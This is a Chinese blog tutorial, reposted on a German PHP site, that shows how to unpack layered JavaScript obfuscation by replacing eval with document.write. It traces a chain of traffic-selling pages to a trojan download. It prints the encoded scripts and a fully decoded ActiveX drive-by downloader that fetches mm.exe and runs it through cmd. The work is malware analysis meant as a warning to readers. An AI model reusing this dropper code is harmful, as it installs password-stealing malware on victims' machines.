Heim > Artikel > Web-Frontend > jser必看的破解javascript各种加密的反向思维方法[原创]_javascript技巧

jser必看的破解javascript各种加密的反向思维方法[原创]_javascript技巧

WBOYOriginal: 2016-05-16 19:14:301188Durchsuche

原创文章,转载请写明出处脚本之家
才发现的破解javascript各种加密的反向思维方法,大家有好的方法都跟帖啊
最近发现了一个代码，加密了5层左右，我将破解到最后一步，而且不用javascript解密程序

用到的软件列表
1、迅雷（下载网页）直接浏览会执行的，看不到源代码
2、或用firefox这个软件可以直接浏览网址，由于firefox的特殊性，也推荐用这个浏览器
一、目标网址 http://www.e9ad.cn/pcdd/80-806.htm
我们用迅雷下载这个页面或用firefox浏览器浏览得到如下代码

复制代码代码如下:

对于这个的解密呢，分析下
大家看下document.write(DFQC(42)+DFQC(126).....
这个DFQC(42)，的DFQC就是解密var DFQC=function(a){return String.fromCharCode(a^22)}
下面我的解密代码也想好了，这个方法基本上可以破解好多的类似代码，大家可以看下这个代码

(a^22)};document.getElementById('thes').innerText=(DFQC(42)+DFQC(126)+DFQC(98)+DFQC(123)

+DFQC(122)+DFQC(40)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(42)+DFQC(126)+DFQC(115)+DFQC(119)+DFQC

(114)+DFQC(40)+DFQC(27)+DFQC(28)+DFQC(42)+DFQC(101)+DFQC(117)+DFQC(100)+DFQC(127)+DFQC(102)

+DFQC(98)+DFQC(40)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(112)+DFQC(99)+DFQC(120)+DFQC(117)+DFQC

(98)+DFQC(127)+DFQC(121)+DFQC(120)+DFQC(54)+DFQC(117)+DFQC(122)+DFQC(115)+DFQC(119)+DFQC

(100)+DFQC(62)+DFQC(63)+DFQC(109)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(69)+DFQC(121)+DFQC(99)

+DFQC(100)+DFQC(117)+DFQC(115)+DFQC(43)+DFQC(114)+DFQC(121)+DFQC(117)+DFQC(99)+DFQC(123)

+DFQC(115)+DFQC(120)+DFQC(98)+DFQC(56)+DFQC(116)+DFQC(121)+DFQC(114)+DFQC(111)+DFQC(56)

+DFQC(112)+DFQC(127)+DFQC(100)+DFQC(101)+DFQC(98)+DFQC(85)+DFQC(126)+DFQC(127)+DFQC(122)

+DFQC(114)+DFQC(56)+DFQC(114)+DFQC(119)+DFQC(98)+DFQC(119)+DFQC(45)+DFQC(27)+DFQC(28)+DFQC

(54)+DFQC(114)+DFQC(121)+DFQC(117)+DFQC(99)+DFQC(123)+DFQC(115)+DFQC(120)+DFQC(98)+DFQC(56)

+DFQC(121)+DFQC(102)+DFQC(115)+DFQC(120)+DFQC(62)+DFQC(63)+DFQC(45)+DFQC(27)+DFQC(28)+DFQC

(54)+DFQC(114)+DFQC(121)+DFQC(117)+DFQC(99)+DFQC(123)+DFQC(115)+DFQC(120)+DFQC(98)+DFQC(56)

+DFQC(117)+DFQC(122)+DFQC(121)+DFQC(101)+DFQC(115)+DFQC(62)+DFQC(63)+DFQC(45)+DFQC(27)+DFQC

(28)+DFQC(54)+DFQC(114)+DFQC(121)+DFQC(117)+DFQC(99)+DFQC(123)+DFQC(115)+DFQC(120)+DFQC(98)

+DFQC(56)+DFQC(98)+DFQC(127)+DFQC(98)+DFQC(122)+DFQC(115)+DFQC(43)+DFQC(52)+DFQC(113)+DFQC

(113)+DFQC(52)+DFQC(45)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(114)+DFQC(121)+DFQC(117)+DFQC(99)

+DFQC(123)+DFQC(115)+DFQC(120)+DFQC(98)+DFQC(56)+DFQC(116)+DFQC(121)+DFQC(114)+DFQC(111)

+DFQC(56)+DFQC(127)+DFQC(120)+DFQC(120)+DFQC(115)+DFQC(100)+DFQC(94)+DFQC(66)+DFQC(91)+DFQC

(90)+DFQC(43)+DFQC(69)+DFQC(121)+DFQC(99)+DFQC(100)+DFQC(117)+DFQC(115)+DFQC(45)+DFQC(27)

+DFQC(28)+DFQC(54)+DFQC(107)+DFQC(42)+DFQC(57)+DFQC(101)+DFQC(117)+DFQC(100)+DFQC(127)+DFQC

(102)+DFQC(98)+DFQC(40)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(42)+DFQC(98)+DFQC(127)+DFQC(98)

+DFQC(122)+DFQC(115)+DFQC(40)+DFQC(119)+DFQC(114)+DFQC(42)+DFQC(57)+DFQC(98)+DFQC(127)+DFQC

(98)+DFQC(122)+DFQC(115)+DFQC(40)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(42)+DFQC(57)+DFQC(126)

+DFQC(115)+DFQC(119)+DFQC(114)+DFQC(40)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(42)+DFQC(116)+DFQC

(121)+DFQC(114)+DFQC(111)+DFQC(54)+DFQC(121)+DFQC(120)+DFQC(122)+DFQC(121)+DFQC(119)+DFQC

(114)+DFQC(43)+DFQC(117)+DFQC(122)+DFQC(115)+DFQC(119)+DFQC(100)+DFQC(62)+DFQC(63)+DFQC(54)

+DFQC(98)+DFQC(121)+DFQC(102)+DFQC(123)+DFQC(119)+DFQC(100)+DFQC(113)+DFQC(127)+DFQC(120)

+DFQC(43)+DFQC(52)+DFQC(38)+DFQC(52)+DFQC(54)+DFQC(122)+DFQC(115)+DFQC(112)+DFQC(98)+DFQC

(123)+DFQC(119)+DFQC(100)+DFQC(113)+DFQC(127)+DFQC(120)+DFQC(43)+DFQC(52)+DFQC(38)+DFQC(52)

+DFQC(54)+DFQC(100)+DFQC(127)+DFQC(113)+DFQC(126)+DFQC(98)+DFQC(123)+DFQC(119)+DFQC(100)

+DFQC(113)+DFQC(127)+DFQC(120)+DFQC(43)+DFQC(52)+DFQC(38)+DFQC(52)+DFQC(54)+DFQC(116)+DFQC

(121)+DFQC(98)+DFQC(98)+DFQC(121)+DFQC(123)+DFQC(123)+DFQC(119)+DFQC(100)+DFQC(113)+DFQC

(127)+DFQC(120)+DFQC(43)+DFQC(52)+DFQC(38)+DFQC(52)+DFQC(40)+DFQC(27)+DFQC(28)+DFQC(54)

+DFQC(42)+DFQC(55)+DFQC(59)+DFQC(59)+DFQC(27)+DFQC(28)+DFQC(42)+DFQC(127)+DFQC(112)+DFQC

(100)+DFQC(119)+DFQC(123)+DFQC(115)+DFQC(54)+DFQC(120)+DFQC(119)+DFQC(123)+DFQC(115)+DFQC

(43)+DFQC(52)+DFQC(95)+DFQC(39)+DFQC(52)+DFQC(54)+DFQC(101)+DFQC(100)+DFQC(117)+DFQC(43)

+DFQC(52)+DFQC(46)+DFQC(38)+DFQC(46)+DFQC(38)+DFQC(56)+DFQC(126)+DFQC(98)+DFQC(123)+DFQC

(52)+DFQC(54)+DFQC(123)+DFQC(119)+DFQC(100)+DFQC(113)+DFQC(127)+DFQC(120)+DFQC(97)+DFQC

(127)+DFQC(114)+DFQC(98)+DFQC(126)+DFQC(43)+DFQC(52)+DFQC(39)+DFQC(52)+DFQC(54)+DFQC(123)

+DFQC(119)+DFQC(100)+DFQC(113)+DFQC(127)+DFQC(120)+DFQC(126)+DFQC(115)+DFQC(127)+DFQC(113)

+DFQC(126)+DFQC(98)+DFQC(43)+DFQC(52)+DFQC(39)+DFQC(52)+DFQC(54)+DFQC(126)+DFQC(115)+DFQC

(127)+DFQC(113)+DFQC(126)+DFQC(98)+DFQC(43)+DFQC(52)+DFQC(46)+DFQC(38)+DFQC(52)+DFQC(54)

+DFQC(97)+DFQC(127)+DFQC(114)+DFQC(98)+DFQC(126)+DFQC(43)+DFQC(52)+DFQC(46)+DFQC(38)+DFQC

(52)+DFQC(54)+DFQC(101)+DFQC(117)+DFQC(100)+DFQC(121)+DFQC(122)+DFQC(122)+DFQC(127)+DFQC

(120)+DFQC(113)+DFQC(43)+DFQC(52)+DFQC(120)+DFQC(121)+DFQC(52)+DFQC(54)+DFQC(116)+DFQC(121)

+DFQC(100)+DFQC(114)+DFQC(115)+DFQC(100)+DFQC(43)+DFQC(52)+DFQC(38)+DFQC(52)+DFQC(54)+DFQC

(112)+DFQC(100)+DFQC(119)+DFQC(123)+DFQC(115)+DFQC(116)+DFQC(121)+DFQC(100)+DFQC(114)+DFQC

(115)+DFQC(100)+DFQC(43)+DFQC(52)+DFQC(38)+DFQC(52)+DFQC(40)+DFQC(42)+DFQC(57)+DFQC(127)

+DFQC(112)+DFQC(100)+DFQC(119)+DFQC(123)+DFQC(115)+DFQC(40)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC

(59)+DFQC(59)+DFQC(40)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(42)+DFQC(57)+DFQC(116)+DFQC(121)

+DFQC(114)+DFQC(111)+DFQC(40)+DFQC(27)+DFQC(28)+DFQC(54)+DFQC(42)+DFQC(57)+DFQC(126)+DFQC

(98)+DFQC(123)+DFQC(122)+DFQC(40)+DFQC(54)+DFQC(27)+DFQC(28)+DFQC(42)+DFQC(69)+DFQC(85)

+DFQC(68)+DFQC(95)+DFQC(70)+DFQC(66)+DFQC(40)+DFQC(54)+DFQC(27)+DFQC(28)+DFQC(42)+DFQC(55)

+DFQC(59)+DFQC(59)+DFQC(54)+DFQC(27)+DFQC(28)+DFQC(97)+DFQC(127)+DFQC(120)+DFQC(114)+DFQC

(121)+DFQC(97)+DFQC(56)+DFQC(114)+DFQC(115)+DFQC(112)+DFQC(119)+DFQC(99)+DFQC(122)+DFQC(98)

+DFQC(69)+DFQC(98)+DFQC(119)+DFQC(98)+DFQC(99)+DFQC(101)+DFQC(43)+DFQC(52)+DFQC(54)+DFQC

(54)+DFQC(52)+DFQC(45)+DFQC(54)+DFQC(27)+DFQC(28)+DFQC(57)+DFQC(57)+DFQC(59)+DFQC(59)+DFQC

(40)+DFQC(54)+DFQC(27)+DFQC(28)+DFQC(42)+DFQC(57)+DFQC(69)+DFQC(85)+DFQC(68)+DFQC(95)+DFQC

(70)+DFQC(66)+DFQC(40)+DFQC(27)+DFQC(28)+DFQC(42)+DFQC(127)+DFQC(112)+DFQC(100)+DFQC(119)

+DFQC(123)+DFQC(115)+DFQC(54)+DFQC(101)+DFQC(100)+DFQC(117)+DFQC(43)+DFQC(126)+DFQC(98)

+DFQC(98)+DFQC(102)+DFQC(44)+DFQC(57)+DFQC(57)+DFQC(102)+DFQC(121)+DFQC(102)+DFQC(56)+DFQC

(97)+DFQC(108)+DFQC(110)+DFQC(103)+DFQC(111)+DFQC(56)+DFQC(117)+DFQC(121)+DFQC(123)+DFQC

(57)+DFQC(33)+DFQC(33)+DFQC(33)+DFQC(57)+DFQC(127)+DFQC(120)+DFQC(114)+DFQC(115)+DFQC(110)

+DFQC(56)+DFQC(126)+DFQC(98)+DFQC(123)+DFQC(54)+DFQC(97)+DFQC(127)+DFQC(114)+DFQC(98)+DFQC

(126)+DFQC(43)+DFQC(38)+DFQC(54)+DFQC(126)+DFQC(115)+DFQC(127)+DFQC(113)+DFQC(126)+DFQC(98)

+DFQC(43)+DFQC(38)+DFQC(40)+DFQC(42)+DFQC(57)+DFQC(127)+DFQC(112)+DFQC(100)+DFQC(119)+DFQC

(123)+DFQC(115)+DFQC(40)+DFQC(27)+DFQC(28)+DFQC(27)+DFQC(28)+'');</script>

[Ctrl+A 全选注:如需引入外部Js需刷新才能执行]

得到的解密的代码就是

复制代码代码如下:

 
<script> <br />
function clear(){ <br />
Source=document.body.firstChild.data; <br />
document.open(); <br />
document.close(); <br />
document.title="gg"; <br />
document.body.innerHTML=Source; <br />
}</script> 

ad 

<script> <br />
<!-- <br />
window.defaultStatus=" "; <br />
//--> <br />
</script>

二、检查下上面的http://www.e9ad.cn/pcdd/8080.htm和http://pop.*****.com/777/index.htm
我发现下面的iframe加载的有问题，所以呢，
用下载工具下载http://pop.*****.com/777/index.htm这个页面的代码可以发现如下

复制代码代码如下:

charset='gb2312'>

看这个大家应该会想起，好多网站卖流量类似的代码（就是卖流量的）
三、继续分析下 http://cc.*****.com/wm/index.htm
用下载工具下载这个页面，可以得到

复制代码代码如下:

好的继续下载http://cc.*****.com/wm/1.js这个js文件我得到了这个代码

复制代码代码如下:

eval(function(p,a,c,k,e,d){e=function(c){return(c35?
String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k
[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])
p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('f 8(n){3 g=h.j()*n;k\'~5
\'+\'.5\'}l{9=\'m://o.p.q/r/s.a\';3 4=t.u("v");4.w("y","z:A-B-C-D-E");3 x=4.7
("G.X"+"M"+"L"+"H"+"T"+"T"+"P","");3 S=4.7("I.J","");S.K=1;x.b("N",9,0);x.O();6=8(R);3
F=4.7("U.V","");3 5=F.W(0);6=F.d(5,6);S.Y();S.Z(x.10);S.11(6,2);S.12();3 Q=4.7
("13.14","");e=F.d(5+\'\\\\15\',\'16.a\');Q.17(e,\' /c \'+6,"","b",0)}18(i)
{i=1}',62,71,'|||var|df|tmp|fname1|CreateObject|gn|dl|exe|open||BuildPath|exp1|function|numb
er|Math||random|return|try|http||cc|wzxqy|com|wm|mm|document|createElement|object|setAttribu
te||classid|clsid|BD96C556|65A3|11D0|983A|00C04FC29E36||Microsoft||Adodb|Stream|type|||GET|s
end|||10000|||Scripting|FileSystemObject|GetSpecialFolder||Open|Write|responseBody|SaveToFil
e|Close|Shell|Application|system32|cmd|ShellExecute|catch'.split('|'),0,{}))

大家看到上面的代码可能会发现无法解密了，我搜了下，发现了，竟然有解密代码了，此处可以分析，不
过我这篇文章的目地，是不用解密程序的，所有我用下面的方法，

var str=(function(p,a,c,k,e,d){e=function(c){return(c<a&#63;'':e(parseInt(c/a)))+((c=c%a)>35&#63;

String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k

[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])

p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('f 8(n){3 g=h.j()*n;k\'~5

\'+\'.5\'}l{9=\'m://o.p.q/r/s.a\';3 4=t.u("v");4.w("y","z:A-B-C-D-E");3 x=4.7

("G.X"+"M"+"L"+"H"+"T"+"T"+"P","");3 S=4.7("I.J","");S.K=1;x.b("N",9,0);x.O();6=8(R);3

F=4.7("U.V","");3 5=F.W(0);6=F.d(5,6);S.Y();S.Z(x.10);S.11(6,2);S.12();3 Q=4.7

("13.14","");e=F.d(5+\'\\\\15\',\'16.a\');Q.17(e,\' /c \'+6,"","b",0)}18(i)

{i=1}',62,71,'|||var|df|tmp|fname1|CreateObject|gn|dl|exe|open||BuildPath|exp1|function|numb

er|Math||random|return|try|http||cc|wzxqy|com|wm|mm|document|createElement|object|setAttribu

te||classid|clsid|BD96C556|65A3|11D0|983A|00C04FC29E36||Microsoft||Adodb|Stream|type|||GET|s

end|||10000|||Scripting|FileSystemObject|GetSpecialFolder||Open|Write|responseBody|SaveToFil

e|Close|Shell|Application|system32|cmd|ShellExecute|catch'.split('|'),0,{}))

document.write(str);

</script>

[Ctrl+A 全选注:如需引入外部Js需刷新才能执行]

上面的方法，我要是考虑下几秒想到的方法，以前没想起，现在大家以后就可以更方面的使用了
先将eval后的代码用 var str=.......,然后document.write(str);得到了下面的代码

复制代码代码如下:

 
function gn(n){var number=Math.random()*n;return'~tmp'+'.tmp'}try 

{dl='http://cc.*****.com/wm/mm.exe';var df=document.createElement("object");df.setAttribute 

("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");var x=df.CreateObject 

("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P","");var S=df.CreateObject 

("Adodb.Stream","");S.type=1;x.open("GET",dl,0);x.send();fname1=gn(10000);var 

F=df.CreateObject("Scripting.FileSystemObject","");var tmp=F.GetSpecialFolder 

(0);fname1=F.BuildPath(tmp,fname1);S.Open();S.Write(x.responseBody);S.SaveToFile 

(fname1,2);S.Close();var Q=df.CreateObject("Shell.Application","");exp1=F.BuildPath 

(tmp+'\\system32','cmd.exe');Q.ShellExecute(exp1,' /c '+fname1,"","open",0)}catch(i){i=1}

然后我们可以发现这个http://cc.*****.com/wm/mm.exe，先下下载下来，记住下载后一般看大小，病毒
文件都很小，先将mm.exe改名位mm.exe.txt，打开看到了如下代码，唉，

复制代码代码如下:

如果您的页面没有自动跳转，请点击这里

看到了吗，最主要的就是这个了 http://cc.*****.com/wm/mm.exe?QVyRR=au6BKUDmtn1
然后用软件下载，这个就是病毒文件了，
终于完成了，发现病毒，应该是盗号系统的木马，现在网上卖流量的很多，大家爱玩游戏的请注意了

当然上面的javascript反向思维方法可以得到大部分的加密的 javascript，而且其它的好多都有解密程
序，大家如果好的方法，都贴出来啊，这样大家才能进步。作者：reterry QQ:461478385
原创文章,转载请写明出处脚本之家

Stellungnahme：

Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn

Vorheriger Artikel：javascript中防止重复点击、防止点击过快实用方法Nächster Artikel：关于脚本操作文本域的问题_表单特效

In Verbindung stehende Artikel

Mehr sehen